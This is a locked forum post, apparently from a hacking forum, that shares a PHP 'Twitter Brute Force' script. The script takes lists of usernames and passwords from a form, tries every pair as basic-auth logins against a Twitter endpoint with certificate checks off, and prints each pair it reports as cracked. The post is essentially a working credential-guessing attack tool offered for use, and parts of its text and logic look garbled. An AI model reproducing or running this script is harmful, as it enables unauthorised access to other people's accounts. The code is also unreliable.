Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Locked Twitter Brute Force


sQuo

Recommended Posts

[LENGUAJE=php]

# Twitter Brute Force # ";echo "

 

This is the hidden content, please
BrureForce' By xSecurity '

 

";if($_POST['username'] and $_POST['password']){ #function function brute($user,$pass) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://userstream.twitter.com/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_POSTFIELDS, "track=twitter"); curl_setopt($ch, CURLOPT_USERPWD, $user.":".$pass); curl_setopt($ch, CURLOPT_FAILONERROR, 1); # cURL - Brute Users & Password $login = curl_exec($ch); $status=(int)curl_getinfo($ch,CURLINFO_HTTP_CODE); if($status=='404') { echo "

[+] Cracked : Username : $user  Password : $pass

"; } } # POSTS $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); # Foreach Users N' Textarea foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); brute($users,$pass); }} # cURL echo "

+----------------------------------------------------------------------+

"; } echo "

Coded By : xSecurity | [email protected] | Thanks 2 : Mr.Dm4R

";?>[/LENGUAJE]
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.